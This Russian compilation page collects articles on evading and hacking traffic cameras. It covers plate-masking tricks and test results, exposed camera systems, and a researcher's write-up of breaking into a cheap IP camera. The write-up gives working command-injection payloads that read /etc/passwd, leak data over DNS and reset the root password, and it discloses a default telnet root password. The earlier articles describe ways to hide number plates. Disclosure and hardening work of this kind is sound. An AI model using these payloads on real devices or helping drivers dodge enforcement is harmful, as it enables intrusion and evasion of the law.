Легко ли взломать камеры ГИБДД?

Как обмануть камеры на дороге

Легко ли взломать камеры ГИБДД?

Всем привет, я сразу скажу что я не приветствую нарешиен правил дорожного движения, и ни в коем случае не призываю вас использовать те способы, что я приведу ниже. А некоторые способы противоречат законам Российской Федерации, и преследуются по закону.

Статья несет лишь информационных характер и ни в коем случае не имеет рекомендательного содержания. Перед прочтением не забудьте поставить ЛАЙК и подписаться на МОЙ КАНАЛ!

В наше время количество камер видеофиксации растет в геометрической прогрессии, и уже складывается ощущение что мы полностью под их присмотром. Особенно много камер на трассах и в пригородах, кто ездил по трассе, прекрасно это знают.

Да и в городе камеры весят уже чуть ли не на каждом столбе и фиксируют каждое наше движение. Сегодня я расскажу вам, какие есть способы избежать штрафов с камер или по крайней мене снизить их количество.

В конечном случае камеры используются для того, что бы не только фиксировать нарушения, но и что бы их предупредить.

Первый способ: радар-детектор

Радар детектор разрешен на территории РФ.

Принцип работы радар детектора вполне прост, на определенном расстоянии до камеры видеофиксации он подает звуковой сигнал или же световой на самом приборе. В целом это хороший способ избежать штрафа, всего лишь не совершив его и как говориться, предупрежден значит вооружен.

Однако есть небольшой минус у данных устройств, а именно когда выходят новые камеры [на новые виды нарушений], то старые модели радаров могут попросту не срабатывать, но происходит это не часто, и при средней цене на радар 2-4т.

р, его хватит точно на год, и поможет вам сэкономить существенную сумму на покупку новой модели радар детектора.

Фото с сайта drive2

Второй способ: шторки на номера.

А уже этот способ запрещен на территории РФ и карается лишением прав.

Запрещенный способ, но не сказать о нем я конечно же не смогу.

Многие наверно видели в интернете и по телевизору ролики с номерными рамками, которые в нужный момент закрывают номера и их не видно.

В целом ставить такое приспособление не советую, так как использование карается серьезными последствиями и не только в момент когда вы скрыли номера, а вообще установка их запрещена. Ниже я привел GIFку с демонстрацией работы шторок на номерные знаки.

Источник видео: https://www..com/watch?v=WxxRIJ3A-qA

Третий способ: навигатор

Ну этот способ самый легальный.

Во многих навигаторах можно устанавливать свои карты или на телефонах и планшетах можно просто открыть Яндекс.Навигатор.

Преимущество данного способа в том, что все стационарные камеры помечены на карте, и не за долго до камеры голос из навигатора или любой звуковой сигнал подскажет вам что впереди камера, и что она фиксирует.

Этот способ лично по мне, так как покупать радар отдельно хоть и не дорого, на захламлять панель не хочется. Я бы посоветовал именно Яндекс.Навигатор, так как сам им пользуюсь и он абсолютно бесплатный.

Фото с сайта kolesa

Четвертый способ: замазать номер

Данный способ крайне не желателен, штраф 500 руб.

Способ хоть и запрещенный, но широко используем автовладельцами в России особенно в межсезонье.

Все просто, автовладелец замазывает номер грязью и он просто не читается на камерах и соответственно вам не могут выслать штраф и как то вас идентифицировать.

Однако первый же экипаж ДПС обязательно вас остановит и заставит почистить номер, и если будете особо выкобениваться, то выпишут вам штраф в 500р, по этому я бы не советовал вам этот способ.

Фото с сайта devyatka

Пятый способ: Антирадар

Запрещенный способ, какой штраф не знаю, но слышал что можно и уголовку словить.

Антирадар ни капли не похож на радар детектор. Если детектор просто предупредит вас о том что впереди камера, то антирадар создает помехи для камеры и в момент проезда автомобиля она попросту не может нормально функционировать.

Способ прям для агента 007. Но в таком случае вы можете повредить саму камеру и если вас поймают, а поймают вас обязательно, то помимо изъятия самого антирадара, который стоит очень дорого, вы еще и уплатите за ремонт камеры и получите как минимум штраф за умышленную порчу имущества.

В общем ни в коем случае не используйте этот способ.

Фото с сайта gorod

Шестой способ: самый банальный, не нарушайте ПДД

Легально, поощряется отсутствием штрафов

Самый простой способ, для которого не нужно никакой техники и смекалки, вы просто едите себе по дороге соблюдая все правила дорожного движения и все у вас круто. Советую этот способ, он не просто избавит вас от штрафов, но и от любых проблем на дороге.

Спасибо что дочитали статью, поставьте лайк и подпишитесь на мой канал!

Источник: https://zen.yandex.ru/media/id/5b27f086659d4100a91a8cca/5b4f60d86dd68f00aa1cbbe0

24 честных способа обмануть камеры видеофиксации

Легко ли взломать камеры ГИБДД?

25 ноября 2013 года

Открытые испытания распространенных камер видеофиксации прошли на автодроме Moscow Raceway, куда были приглашены представители общественных организаций, в том числе известные многим «Синие ведерки».

Противостояли изобретательным «нарушителям» четыре комплекса — «Стрелка», «Автоураган», «Кордон» и «Кречет». Естественно, наибольшее внимание было приковано к «Стрелке», которая в последние годы заполонила дороги Москвы и Подмосковья.

Принцип работы всех типов камер одинаковый — измерение мгновенной скорости, отличаются они лишь техничес­кими тонкостями.

Координатор «Синих ведерок» Петр Шкуматов обманул камеру, применив сразу несколько способов, при этом визуально номер вполне можно было распознатьКоординатор «Синих ведерок» Петр Шкуматов обманул камеру, применив сразу несколько способов, при этом визуально номер вполне можно было распознать

Технологии обмана

Среди способов обмануть камеры были как стандартные, типа заклеивания части номера бумажкой, так и совсем уж необычные, например второй фальшивый регистрационный знак, закрепленный на решетке радиатора.

Ему, кстати, все равно обмануть ни одну из систем не удалось — все они безошибочно определили нужный номер. А вот справиться с перевернутым номером камеры не смогли — он сразу же был отнесен к разряду нечитаемых.

Правда, такая крайняя изобретательность в реальных условиях может закончиться плохо у первого же поста ДПС — за нечитаемые номера придется заплатить штраф.

Главным разочарованием для автовладельцев может стать то, что самый распространенный способ избежать штрафа — наклеенный на один из символов номера листик (неважно, кленовый это лист или же лист бумаги) совершенно бесполезен. Дело в том, что все камеры оснащены специальными инфракрасными излучателями, и тонкая преграда в виде листика для них не помеха. А вот что-то потолще, например, картон, уже может устоять против «зондирующих» лучей.

Обманка с фальшивым знаком чуть выше основного номера не сработала — комплексы видеофиксации знают, на какой части автомобиля должен располагаться номер, и за пределы этой части не смотрятОбманка с фальшивым знаком чуть выше основного номера не сработала — комплексы видеофиксации знают, на какой части автомобиля должен располагаться номер, и за пределы этой части не смотрят

Не удалось комплексам видеофиксации определить те номера, в которых хотя бы один символ был закрашен или обесцвечен (это делали обычной замазкой), а также те, на которых был унич­тожен рельеф. Камеры в этих случаях бессильны, даже несмотря на то, что человеческий глаз легко определит номер. Однако проблема скорее всего решится, когда за дело возьмется сотрудник центра обработки информации, ведь именно туда отправляются номера, в которых камера не может распознать всего один символ.

По итогам испытаний все камеры оказались практически одинаково не готовы стопроцентно преодолеть маскировку номеров, к которой порой прибегают водители, и проиграли со счетом 10:14.

Работа над ошибками

По словам разработчиков камер, присутствовавших на испытаниях, все выявленные недостатки их систем планируется устранить в ближайшее время.

Так, камеры хотят научить различать цвет, марку, а возможно, и модель автомобиля, тогда при «сомнении» в том или ином номере система сможет проверить все возможные варианты по базе и выбрать нужный.

Кроме того, будет организационно улучшена работа операторов, перепроверяющих показания камер.

А идея с закрашиванием номера замазкой сработала. Правда, закрашивать придется больше, чем один символ, иначе система передаст право определять ваш номер операторуА идея с закрашиванием номера замазкой сработала.

Правда, закрашивать придется больше, чем один символ, иначе система передаст право определять ваш номер оператору

Самой же главной проблемой разработчики сочли плохое обслуживание видеокомплексов. Те же «Стрелки» банально редко моют, из-за этого они со временем начинают некорректно фиксировать номер или вовсе слепнут.

Поэтому предлагается законодательно закрепить необходимость обслуживания систем автоматической фиксации нарушений.

Вердикт

Сергей Настин, редактор:

− Да, испытания показали, что технологии несовершенны и их можно обманывать. Однако вряд ли на дороге кто-то решится применять такие наглые ухищрения. Так что прошедшие испытания водителям не стоит воспринимать как призыв к действию. Скорее они стали полезным уроком для разработчиков систем конт­роля, показавшим, что полностью заменить человеческий глаз и мозг компьютер пока не может.

Очень жаль, что в тестировании не участвовали комплексы, измеряющие среднюю скорость автомобиля, а не моментальную. Вот это действительно могло бы быть полезно, ведь они уже активно устанавливаются на дорогах Москвы и области, но пока еще никто не знает, чего от них ожидать и насколько точно они работают.

24 честных способа обмануть камеры видеофиксации24 честных способа обмануть камеры видеофиксацииОшибка в тексте? Выделите её мышкой! И нажмите: Ctrl + Enter

Источник: https://www.zr.ru/content/articles/593326-moskva-mastera-maskirovki/

Легко ли взломать камеры ГИБДД?

Легко ли взломать камеры ГИБДД?

Специалисты «Лаборатории Касперского» заявили, что злоумышленники могут легко подключаться к комплексам фиксации нарушений и манипулировать собранной информацией. Как это отразится на водителях, узнаем у инструкторов по вождению.

Доступ для всех?

По словам автоинструкторов, узнать IP-адреса систем фото- и видеофиксации нарушений оказалось легко с помощью поискового механизма Shodan.

Выяснилось, что для доступа к комплексам не нужен пароль: видеопоток, а также другая дополнительная информация (к примеру, геокоординаты камеры) доступны любому пользователю интернета.

Более того, в открытом доступе находятся и некоторые инструменты, которые позволяют контролировать функционирование камеры.

Как известно, многие камеры регистрации скоростного режима фиксируют превышение только на определенных полосах движения. Так вот эту функцию можно без проблем отключить. Информацией с камер ГИБДД иногда пользуются правоохранительные органы, а наличие таких уязвимостей систем может сыграть на руку преступникам.

В частности, данными могут воспользоваться угонщики. Например, преступники могут удалять информацию о транспортных средствах, которые числятся в угоне, или следить за сотрудниками полиции, которые занимаются преследованием.

Кстати, «Лаборатория Касперского» выявила уязвимость и других элементов городской инфраструктуры: автоматов по продаже билетов в кинотеатры и платежных терминалов велопроката.

Радарные комплексы

Все камеры фиксации нарушений делятся на три основных вида: радарные, камеры видеофиксации и лазерные. Что касается метода установки, то это мобильные и стационарные.

Радарные комплексы отличаются наличием радарного датчика и глазка самой камеры. Такие приборы работают в два этапа: сначала замеряют скорость, а потом фиксируют нарушения.

Камера «сканирует» дорогу доплеровским лучом, замеряющим скорость на расстоянии около одного километра у автомобилей, двигающихся в попутном и во встречном направлениях.

Радиус покрытия — максимум две полосы в одну сторону и две в другую, или четыре полосы только в одну сторону.

После замера скорости камера фотографирует регистрационный номер ТС и распознает его с помощью специальной программы.

Как правило, такие камеры оснащены инфракрасными прожекторами, чтобы подсвечивать номера в плохую погоду или в ночное время.

Если подсветка стационарного комплекса в дневное время не моргает, это не значит, что камера выключена. Скорее всего, не работает именно подсветка (за ненадобностью), а сам комплекс функционирует в нормальном режиме.

В ночное время ИК подсветка работает всегда, так как без нее регистрационный знак ТС распознать невозможно.

«Кукушки»

Последнее время широкое распространение получили, так называемые, «кукушки». Это камеры, которые оснащены только радаром, а на месте объектива стоит стеклянная заглушка.

Такие системы стоят в десятки раз дешевле, и их единственная задача — посылать радиолокационный луч. Это сбивает с толку автовладельцев, у которых в машинах стоят антирадары, и водители сбрасывают скорость. На самом же деле никакой фиксации такие камеры не делают.

Раньше отличить их можно было по размерам ящика с оборудованием. Однако сейчас делают муляжи, так что на расстоянии довольно сложно распознать настоящий это комплекс или «кукушка».

Лазерные камеры

Камеры, фиксирующие скоростной режим при помощи лазеров, в нашей стране встречаются реже. У лазерных измерителей больший диапазон замеряемых скоростей (от 1,5 до 350 км/ч) и большая дальность.

Единственный недостаток систем, работающих в инфракрасном диапазоне, — некачественная работа в непогоду.

Например, в сильный туман в условиях плохой видимости такие камеры просто перестают функционировать, так как не могут сделать хорошую фотографию объекта, то есть автомобиля.

Камеры фотофиксации

Комплексы фиксации нарушений измеряют скорость на базе обработки видеокадров. А именно:

  • первый кадр — фиксация транспортного средства,
  • следующие кадры — фото ТС через каждые 40 мс.

По этим данным система измеряет пройденное расстояние за определенное время и высчитывается скорость движения автомобиля.

Камеры фотофиксации ставят, как правило, на одну полосу по ходу движения транспортного потока. Среди достоинств, помимо фиксации превышения скорости, следует отметить:

  • возможность фиксировать проезд на запрещающий сигнал светофора,
  • проезд железнодорожного переезда на запрещающий сигнал,
  • выезд за стоп-линию,
  • проезд под запрещающий знак,
  • езда по обочине,
  • проезд по трамвайным путям, велосипедным дорожкам, тротуарам и выделенным полосам,
  • выезд на встречную полосу,
  • фиксация непристегнутых пассажиров,
  • непредоставление преимущества пешеходам,
  • выключенные фары ближнего света или дневные ходовые огни,
  • использование во время движения мобильного телефона.

Где камер нет?

Камеры вы, скорее всего, не встретите на неосвещенных участках трасс. Дело в том, что оборудование камер вспышками запрещено Российским законодательством из соображений безопасности.

Что касается инфракрасной подсветки, то она способна высветить лишь регистрационный номер авто. При разбирательстве любой судья отменит штрафную квитанцию, если на ней не будет видно самой машины.

Такие же проблемы могут быть из-за низкого качества принтеров и бумаги для печати постановлений в центрах фиксации нарушений.

Камеры также не устанавливают в местах сильных перепадов высот и на изгибах дорог.

А вот на днях в столице на Ярославском шоссе и проспекте Мира заработали еще 15 комплексов, которые фиксируют проезд по реверсивным полосам. Это нарушение приравнивается к выезду на встречку, поэтому карается штрафом в 5 000 руб.

А знаете ли вы 100-процентный способ не попасть в объектив камер фиксации нарушений? Просто не нарушайте!

о факте взлома хакерами камер на дорогах в Подмосковье:

Уверенной и спокойной езды!

В статье использовано изображение с сайта avtospravochnaya.com

Источник: http://spokoino.ru/articles/gibdd/legko_li_vzlomat_kamery_gibdd/

Как я взломал свою ip-камеру и нашел там бекдор

Легко ли взломать камеры ГИБДД?

Время пришло. Я купил себе второе IoT устройство в виде дешевой ip-камеры. Мои ожидания относящиеся к безопасности этой камеры были не высоки, это была самая дешевая камера из всех. Но она смогла меня удивить.

Я открыл коробку, и первое что увидел — это пароль из 4 цифр.

Это пароль пользователя «Администратор», для настройки устройства. Смотрите видео ниже. Большинство людей не заботятся о том, чтобы поменять этот пароль. Очевидно, что эта камера может общаться по Ethernet кабелю или Wi-Fi. Порадовала поддержка WPA2, однако люди склонны оставить Wi-Fi незащищённым.

Перехватив трафик между камерой и десктопным приложением, легко заметить что данные передаются по HTTP через 81 порт. Просто гениальное управление сеансом. Имя пользователя и пароль передаются в каждом GET запросе, без шифрования. Хоть Wi-Fi был защищён.

К счастью десктопное приложение сохраняет для вас пароль в открытом виде в файле: «C:\Users\\AppData\Local\VirtualStore\Program Files (x86)\\list.dat» Эта замечательная камера обращается к облаку по UDP. Серверы находятся в Гонконге и Китае. Если вам инетересно, зачем ip-камере подключение к облаку, то всё просто.

Эта камера умеет взаимодействовать с мобильными приложениями для Android и IOS. И пользователи подключаются к облаку, чтобы не заморачиваться с настройкой портов и DNS. Супер. Натравим nmap на это устройство. PORT STATE SERVICE VERSION23/tcp open telnet BusyBox telnetd81/tcp open http GoAhead-Webs httpd| http-auth: | HTTP/1.

1 401 Unauthorized|_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81|_http-methods: No Allow or Public header in OPTIONS response (status code 400)|_http-title: Document Error: Unauthorized8600/tcp open tcpwrapped Определился HTTP сервер, Telnet сервер на BusyBox, и какой-то порт 8600. В 27-страничном руководстве не говорится ни слова про Telnet. Как нам назвать этот порт? Отладочный порт? Или бекдор порт? Посмотрим. Я вручную попробовал несколько паролей для пользователя root, но ни один из них не сработал. Я двинулся дальше.

Двойная Слепая инъекция

IP-камера может загружать снимки на FTP сервер. Однако эта опция требует предварительной настройки. Когда я её настроил, оказалось что это не работает. Имя пользователя и пароль от сервера были не верными. После некоторой отладки выяснилось, проблема была в том, что у меня пароль содержал символ $. И я начал копать.

Я был уверен, что эта уязвимость позволяет вставлять команды, но не знал как её использовать. Были многочисленные проблемы, усложняющие эксплуатацию. Я называю эту уязвимость двойной слепой инъекцией. Во первых мы не видим вывод этой команды, а во вторых, ёё выполнение происходит в другом потоке. Таким образом использование sleep ни к чему не приводит.

Но третья проблема была хуже всех — это ограничение в 32 символа. Я мог отправить некоторую информацию через DNS. И с помощью следующих команд, я мог получить текущий каталог: $(ping%20-c%202%20%60pwd%60) Или та же команда в читаемом виде: $(ping -c 2 `pwd`) но мне не удавалось вытащить информацию из /etc/passwd.

Я попытался выполнить $(reboot), но это была очень плохая идея, и камера ушла в бесконечный ребут, а кнопки аппаратного сброса не работали. Весёлые времена. Ниже представлены мои отчаянные попытки получить доступ к оболочке. Спасибо EQ за его помощь в процессе ночного взлома. И за его великие идеи.

$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name$(cat /tmp/a|head -1>/tmp/b) ;filter for the first row$(cat/tmp/c) ;filter out unwanted characters$(ping `cat /tmp/c`) ;leak it via DNS После того, как я наконец взломал камеру, возникла следующая проблема. Там не было команд head, tr, less, more или cut.

Небыло nc и даже bash`а не было…

Я даже пытался использовать commix, из видео на он подавал большие надежды. Commix похож на sqlmap но только для инъекций команд. Однако этот случай, для него был слишком сложен.

После многочисленных неудачных попыток, я наконец-то нашёл пароль. Сезам откройся. $(echo 'root:passwd'|chpasswd) Логинимся через telnet (none) login: rootPassword: BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)Enter 'help' for a list of built-in commands.# Вау Вау 🙂 Я быстро нашёл место, куда инъектилась моя команда: # cat /tmp/ftpupdate.sh/system/system/bin/ftp -n Всякий раз когда мы вводим команду в поле пароля, она копируется в этот скрипт, который затем исполняется. После этого я испугался, что забыл сохранить содержимое /etc/passwd, так как собирался взломать ещё и дефолтный пароль на telnet. К счастью, ребут восстановил исходные данные. root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
К сожалению запускать старый добрый John The Ripper не пришлось, так как гугл подсказал что это хеш пароля 123456. Это куда безопасней чем пароль багажа.

Пора резюмировать то, что у нас есть. Существует недокументированный telnet'овский порт IP-камеры, с паролем: 123456 для пользователя root, нет GUI, чтобы изменить этот пароль, а если изменить его с помощью консоли, он вернётся после следующей перезагрузки. Я думаю, что это смело можно назвать бэкдором.

С помощью root доступа к консоли мы можем получить пароль для FTP-сервера, для сервера SMTP (для оповещений), пароль WiFi (хотя мы, вероятно, его уже имеем), доступ к административному интерфейсу камеры, или просто можем перенастроить камеру как мы хотим. К счастью, чаще всего этот порт Telnet находится за NAT или брандмауэром, поэтому он не доступен из интернета. Но всегда есть исключения. К счастью, UPNP не позволяет настроить порт Telnet, чтобы он был доступен из Интернета, только камера HTTP порт 81. Вас защищает только тот пароль из 4 цифр, что стоит по умолчанию. И последнее, всё работает от root`а, что не удивительно.

Мой список изменений

Я добавил эти строки в конец файла /system/init/ipcam.sh: sleep 15echo 'root:CorrectHorseBatteryRedStaple'|chpasswd Кроме того, если вы хотите, вы можете отключить службу телнет закомментировав Telnetd в /system/init/ipcam.sh.

Если хотите, отключите подключение к облаку (вы не сможете использовать мобильные приложения), поместите следующую команду в начало файла /system/init/ipcam.

sh iptables -A OUTPUT -p udp ! —dport 53 -j DROP Вы можете использовать OpenVPN для подключения к домашней сети, чтобы получить доступ к веб-интерфейсу камеры. Он работает с Android, IOS, и любой десктопной ОС. 99% людей, которые покупают эти IP-камеры думают, что они будут в безопасности с ней.

Теперь я понимаю, наклейку, которая поставляется вместе с IP-камерой.

Так что, когда Вы в следующем эпизоде ​​Mr Robot увидите как кто-то подключился к ip-камере через Telnet с root:123456, вы будете знать, что это печальная реальность.

  • 19 июля 2019 в 09:44
  • 27 июня 2019 в 16:00
  • 20 июня 2019 в 16:55

Источник: https://habr.com/post/316296/

Спорам нет
Добавить комментарий